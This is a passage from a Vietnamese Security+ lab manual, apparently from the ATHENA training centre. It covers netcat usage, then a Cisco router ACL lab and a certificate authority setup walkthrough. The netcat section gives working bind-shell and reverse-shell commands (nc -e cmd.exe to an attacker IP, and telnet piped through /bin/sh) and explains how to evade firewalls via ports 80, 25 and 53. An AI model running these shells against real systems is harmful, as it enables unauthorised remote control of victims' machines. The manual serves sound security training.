trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi -l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến -L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối. -n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS -o file ghi nhật kí vào file -p port chỉ định cổng port -r yêu cầu Netcat chọn cổng ngẫu nhiên(random) -s addr giả mạo địa chỉ IP nguồn là addr -t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd. -u dùng UDP(mặc định netcat dùng TCP) -v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa. -w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 53
  62. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN -z chế độ zero I/O, thường được sử dụng khi scan port Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3, ,8080 4. Các ví dụ: 4.1 Chộp banner của web server Ví dụ: nc đến 172.16.84.2, cổng 80 C:>nc 172.16.84.2 80 HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa) C:>nc -vv 172.16.84.1 80 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: "0-cec-3899eaea" Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ: nc -vv -o nhat_ki.log 172.16.84.2 80 Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 54
  63. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - xem file nhat_ki.log nghĩa là netcat gởi đến server 4.2 Quét cổng - chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1 [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open - nếu bạn cần scan các cổng UDP, dùng -u [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 55
  64. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open 4.3 Biến Netcat thành một trojan - trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn - l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ: E:>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error - trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080 C:>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. E:>cd test cd test E:test>dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:test [.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free C:test>exit exit sent 20, rcvd 450: NOTSOCK Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 56
  65. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux. E:>nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 - Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s . Ví dụ: netstat -a TCP nan_nhan:domain nan_nhan:0 LISTENING nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53 listening on [172.16.84.1] 53 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163 - Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong. - Chú ý: bạn không thể chạy netcat với -u -e cmd.exe hoặc -u -e /bin/sh vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat. 5. Kĩ thuật tiên tiến 5.1 Telnet nghịch chuuyển - dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ: - trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25: + cửa sổ Netcat (1) C:>nc -nvv -l -p 80 listennng on [any] 80 connect to [172.16.84.1] from [172.16.84.2] 1055 pwd ls -la Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 57
  66. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN _ + cửa sổ Netcat (2) C:>nc -nvv -l -p 25 listening on [any] 25 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056 / total 171 drwxr-xr-x 17 root root 4096 Feb 5 16:15 . drwxr-xr-x 17 root root 4096 Feb 5 16:15 drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²? drwx 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var - trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất: [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25 /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 172.16.84.1 Connected to 172.16.84.1. Escape character is '^]'. _ Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 58
  67. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2). Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc. 5.2 Tạo kênh sau Cũng tương tự như telnet nghịch chuyển. - trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn: C:>nc -nvv -l -p 80 listennng on [any] 80 - tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell: E:>nc -e cmd.exe 172.16.84.1 80 Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo. C:>nc -nvv -l -p 80 listenning pm [any] 80 connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035 Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. E:> 5.3 Đổi hướng cổng Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau: - chạy nc trên cổng bất kì: E:>nc -nvv -L -p 1234 -e cmd.exe listening on [any] 1234 - chạy tunnel hoặc fpipe để đổi hướng cổng Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 59
  68. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN C:>perl tunnel.pl port=53 tohost=127.0.0.1 toport=1234 C:>fpipe -l 53 -r 1234 127.0.0.1 tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe. Đổi hướng cổng là một cách để đi vòng qua firewalls. Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 60
  69. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bài 9: NGĂN CHẶN USER BÊN TRONG LAN SỬ DỤNG CÁC DỊCH VỤ YAHOO MESSENGER TRÊN INTERNET 1. Giới thiệu: Bài Lab này cung cấp cho học viên kiến thức về sử dụng các thiết bị firewall để ngăn chặn user sử dụng các dịch vụ trên internet như chat, ftp, telnet, 2. Yêu cầu bài lab : Sử dụng router 2611 có kết nối internet như sơ đồ bên dưới, ngăn chặn không cho phép user bên trong mạng Lan sử dụng dịch vụ yahoo messenger. F0/1: 192.168.1.1 F0/0: 10.0.0.100 10.0.0.2/8 Internet PC 192.168.1.2/24 3. Các bước thực hiện: Vì yahoo messenger sử dụng port 5050 để cung cấp dịch vụ chat trên toàn hệ thống. Do đó ,để ngăn chặn các user trong mạng Lan sử dụng dịch vụ chat , trên router 2611 chúng ta cần phải có một access-list cấm port 5050. Do IP gán cho router 2611 là IP local , do đó để user bên trong có thể ra được internet thì trên router phải cấu hình NAT và static route. Sau đây là cấu hình tham khảo (có thể một số lệnh trong cấu hình này không chính xác vì phụ thuộc vào version IOS) Router#show run Current configuration : 745 bytes ! version 12.3 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption ! hostname Router ! boot-start-marker boot-end-marker Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 60
  70. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN ! enable password cisco ! no aaa new-model ip subnet-zero ip cef ! ! ! ! interface Ethernet0/0 ip address 10.0.0.100 255.0.0.0 ip nat outside half-duplex ! interface Serial0/0 no ip address shutdown ! interface BRI0/0 no ip address shutdown ! interface Ethernet0/1 ip address 192.168.1.1 255.255.255.0 ip nat inside ip access-group 101 in half-duplex ! ip nat inside source static 192.168.1.2 10.0.0.100 ”Nat các packet có source =192.168.1.2 10.0.0.100” no ip http server ip classless access-list 101 deny tcp 192.168.1.0 0.0.0.255 10.0.0.2 0.0.0.0 eq 5050 access-list 101 permit ip any any ip route 0.0.0.0 0.0.0.0 10.0.0.2 cho các gói có the ra ngoài internet ! ! line con 0 password cisco login line aux 0 Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 61
  71. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN line vty 0 4 ! end Router# 4. Sau khi cấu hình xong : Thực hiện kiểm tra sẽ thấy user bên trong sẽ ko vào được yahoo messenger. Còn các dịch vụ truy câp internet khác vẫn diễn ra bình thường Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 62
  72. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bài 10: CA ( CERTIFICATE AUTHORITY) CÁC KHÁI NIỆM VỀ CHỨNG CHỈ SỐ: CHỨNG CHỈ SỐ LÀ GÌ? Chứng chỉ số là một tệp tin điện tử dùng để xác minh danh tính một cá nhân, một máy chủ, một công ty trên Internet. Nó giống như bằng lái xe, hộ chiếu, chứng minh thư hay những giấy tờ xác minh cá nhân. Để có chứng minh thư, bạn phải được cơ quan Công An sở tại cấp. Chứng chỉ số cũng vậy, phải do một tổ chức đứng ra chứng nhận những thông tin của bạn là chính xác, được gọi là Nhà cung cấp chứng thực số (Certificate Authority, viết tắt là CA). CA phải đảm bảo về độ tin cậy, chịu trách nhiệm về độ chính xác của chứng chỉ số mà mình cấp. Trong chứng chỉ số có ba thành phần chính: Thông tin cá nhân của người được cấp Khoá công khai (Public key) của người được cấp Chữ ký số của CA cấp chứng chỉ Thông tin cá nhân: Đây là các thông tin của đối tượng được cấp chứng chỉ số, gồm tên, quốc tịch, địa chỉ, điện thoại, email, tên tổ chức .v.v. Phần này giống như các thông tin trên chứng minh thư của mỗi người. LỢI ÍCH CỦA CHỨNG CHỈ SỐ? Mã hoá: Lợi ích đầu tiên của chứng chỉ số là tính bảo mật thông tin. Khi người gửi đã mã hoá thông tin bằng khoá công khai của bạn, chắc chắn chỉ có bạn mới giải mã được thông tin để đọc. Trong quá trình truyền thông tin qua Internet, dù có đọc được các gói tin đã mã hoá này, kẻ xấu cũng không thể biết được trong gói tin có thông tin gì. Đây là một tính năng rất quan trọng, giúp người sử dụng hoàn toàn tin cậy về khả năng bảo mật thông tin. Những Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 63
  73. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN trao đổi thông tin cần bảo mật cao, chẳng hạn giao dịch liên ngân hàng, ngân hàng điện tử, thanh toán bằng thẻ tín dụng, đều cần phải có chứng chỉ số để đảm bảo an toàn. Chống giả mạo: Khi bạn gửi đi một thông tin, có thể là một dữ liệu hoặc một email, có sử dụng chứng chỉ số, người nhận sẽ kiểm tra được thông tin của bạn có bị thay đổi hay không. Bất kỳ một sự sửa đổi hay thay thế nội dung của thông điệp gốc đều sẽ bị phát hiện. Địa chỉ mail của bạn, tên domain đều có thể bị kẻ xấu làm giả để đánh lừa người nhận để lây lan virus, ăn cắp thông tin quan trọng. Tuy nhiên, chứng chỉ số thì không thể làm giả, nên việc trao đổi thông tin có kèm chứng chỉ số luôn đảm bảo an toàn. Xác thực: Khi bạn gửi một thông tin kèm chứng chỉ số, người nhận - có thể là đối tác kinh doanh, tổ chức hoặc cơ quan chính quyền - sẽ xác định rõ được danh tính của bạn. Có nghĩa là dù không nhìn thấy bạn, nhưng qua hệ thống chứng chỉ số mà bạn và người nhận cùng sử dụng, người nhận sẽ biết chắc chắn đó là bạn chứ không phải là một người khác. Xác thực là một tính năng rất quan trọng trong việc thực hiện các giao dịch điện tử qua mạng, cũng như các thủ tục hành chính với cơ quan pháp quyền. Các hoạt động này cần phải xác minh rõ người gửi thông tin để sử dụng tư cách pháp nhân. Đây chính là nền tảng của một Chính phủ điện tử, môi trường cho phép công dân có thể giao tiếp, thực hiện các công việc hành chính với cơ quan nhà nước hoàn toàn qua mạng. Có thể nói, chứng chỉ số là một phần không thể thiếu, là phần cốt lõi của Chính phủ điện tử. Chống chối cãi nguồn gốc: Khi sử dụng một chứng chỉ số, bạn phải chịu trách nhiệm hoàn toàn về những thông tin mà chứng chỉ số đi kèm. Trong trường hợp người gửi chối cãi, phủ nhận một thông tin nào đó không phải do Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 64
  74. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN mình gửi (chẳng hạn một đơn đặt hàng qua mạng), chứng chỉ số mà người nhận có được sẽ là bằng chứng khẳng định người gửi là tác giả của thông tin đó. Trong trường hợp chối cãi, CA cung cấp chứng chỉ số cho hai bên sẽ chịu trách nhiệm xác minh nguồn gốc thông tin, chứng tỏ nguồn gốc thông tin được gửi. Chữ ký điện tử: Email đóng một vai trò khá quan trọng trong trao đổi thông tin hàng ngày của chúng ta vì ưu điểm nhanh, rẻ và dễ sử dụng. Những thông điệp có thể gửi đi nhanh chóng, qua Internet, đến những khách hàng, đồng nghiệp, nhà cung cấp và các đối tác. Tuy nhiên, email rất dễ bị tổn thương bởi các hacker. Những thông điệp có thể bị đọc hay bị giả mạo trước khi đến người nhận. Bằng việc sử dụng chứng chỉ số cá nhân, bạn sẽ ngăn ngừa được các nguy cơ này mà vẫn không làm giảm những lợi thế của email. Với chứng chỉ số cá nhân, bạn có thể tạo thêm một chữ ký điện tử vào email như một bằng chứng xác nhận của mình. Chữ ký điện tử cũng có các tính năng xác thực thông tin, toàn vẹn dữ liệu và chống chối cãi nguồn gốc. Ngoài ra, chứng chỉ số cá nhân còn cho phép người dùng có thể chứng thực mình với một web server thông qua giao thức bảo mật SSL. Phương pháp chứng thực dựa trên chứng chỉ số được đánh giá là tốt, an toàn và bảo mật hơn phương pháp chứng thực truyền thống dựa trên mật khẩu. Bảo mật Website:Khi Website của bạn sử dụng cho mục đích thương mại điện tử hay cho những mục đích quan trọng khác, những thông tin trao đổi giữa bạn và khách hàng của bạn có thể bị lộ. Để tránh nguy cơ này, bạn có thể dùng chứng chỉ số SSL Server để bảo mật cho Website của mình. Chứng chỉ số SSL Server sẽ cho phép bạn lập cấu hình Website của mình theo giao thức bảo mật SSL (Secure Sockets Layer). Loại chứng chỉ số này sẽ cung cấp cho Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 65
  75. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Website của bạn một định danh duy nhất nhằm đảm bảo với khách hàng của bạn về tính xác thực và tính hợp pháp của Website. Chứng chỉ số SSL Server cũng cho phép trao đổi thông tin an toàn và bảo mật giữa Website với khách hàng, nhân viên và đối tác của bạn thông qua công nghệ SSL mà nổi bật là các tính năng: + Thực hiện mua bán bằng thẻ tín dụng + Bảo vệ những thông tin cá nhân nhạy cảm của khách hàng + Đảm bảo hacker không thể dò tìm được mật khẩu Đảm bảo phần mềm:Nếu bạn là một nhà sản xuất phần mềm, chắc chắn bạn sẽ cần những ''con tem chống hàng giả'' cho sản phẩm của mình. Đây là một công cụ không thể thiếu trong việc áp dụng hình thức sở hữu bản quyền. Chứng chỉ số Nhà phát triển phần mềm sẽ cho phép bạn ký vào các applet, script, Java software, ActiveX control, các file dạng EXE, CAB, DLL Như vậy, thông qua chứng chỉ số, bạn sẽ đảm bảo tính hợp pháp cũng như nguồn gốc xuất xứ của sản phẩm. Hơn nữa người dùng sản phẩm có thể xác thực được bạn là nhà cung cấp, phát hiện được sự thay đổi của chương trình (do vô tình hỏng hay do virus phá, bị crack và bán lậu ). NHÀ CUNG CẤP CHỨNG THỰC SỐ CA Trong các hệ thống quản lý chứng thực số đang hoạt động trên thế giới, nhà cung cấp chứng thực số (Certificate authority - CA) là một tổ chức chuyên đưa ra và quản lý các nội dung xác thực bảo mật trên một mạng máy tính, cùng các khoá công khai để mã hoá thông tin. Là một phần trong Cơ sở hạ tầng khoá công khai (public key infrastructure - PKI), một CA sẽ kiểm soát cùng với một nhà quản lý đăng ký (Registration authority - RA) để xác minh thông tin về Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 66
  76. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN một chứng chỉ số mà người yêu cầu xác thực đưa ra. Nếu RA xác nhận thông tin của người cần xác thực, CA sau đó sẽ đưa ra một chứng chỉ. Tuỳ thuộc vào việc triển khai cơ sở hạ tầng khoá công khai, chứng chỉ số sẽ bao gồm khoá công khai của người sở hữu, thời hạn hết hiệu lực của chứng chỉ, tên chủ sở hữu và các thông tin khác về chủ khoá công khai. 1. CÁC THÀNH PHẦN TRONG MÔ HÌNH CA server: 26.0.0.2 Client và webserver: 26.0.0.3 2. CÀI ĐẶT VÀ CẤU HÌNH CERTIFICATE AUTHORITY – CA Click Start Setting Control Panel Add or Remove Programs Add or Remove Windows Component Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 67
  77. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Check  vào ô Certificate Services. Chọn Next. Chương trình sẽ hiện bảng Warning “Nếu sau khi đã cài Certificate Services thì những thông tin các thành viên trong domain sẽ không được thay đổi như quyền được hưởng và CA được lưu trữ trong Active Directory, cho nên bạn phải chắc chắn rằng những thông tin các thành viên trong Domain đã được Configured & Install trước khi cài Certificate Services”.Chúng ta chấp nhận và Click Yes Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 68
  78. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Chúng ta chọn Enterprise Root CA Click Next Hoàn thành các thông tin yêu cầu: Common name for this CA : Server1 (Computer Name CA Server) Distinguished name suffix : DC=vt04c1,DC=com Preview of Distinguished name : CN=server1,DC=vt04c1,CN=com Expiration date : 5 năm Click Next tiếp tục quá trình cài đặt Certificate Services Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 69
  79. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Information Certificate Database & Certificate Database Log được lưu trữ C:\WINDOWS\system32\CertLog Click Browse để thay đổi nơi lưu trữ Nếu muốn Share Information Configuration thì ð Store onfiguration information Sau đó Click Next Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 70
  80. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Chương trình xuất hiện bảng Warning:“Chương trình sẽ STOP Service IIS” Click Yes để tiếp tục Chương trình yêu cầu Source Win2k3 C:\source win2k3\I386\Certsrv Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 71
  81. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Click File Certsrv.exe Click Open Chương trình đang cấu hình Certificate Services Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 72
  82. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Click Finish hòan thành quá trính cài đặt Certificate Services Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 73
  83. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN 3. USER ĐĂNG KÝ CA Sau khi cài xong CA server .Trên máy client ta sẽ đăng ký 1 Certificate cho User Test Ta mở trình duyệt Web Internet Explorer trên máy client để đăng ký Nhập cá thông tin sau: Address : 26.0.0.2/certsrv Hoặc : Trang Web đăng ký xuất hiện Sau đó Click Request a Certificate Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 74
  84. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Màn hình sau xuất hiện : Click Advanced Certificate Request Click Create and Submit a request to this CA Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 75
  85. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Điền các thông tin của client: Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 76
  86. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Trong mục Certifcate Template chọn User  Store Certificate Click Submit Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 77
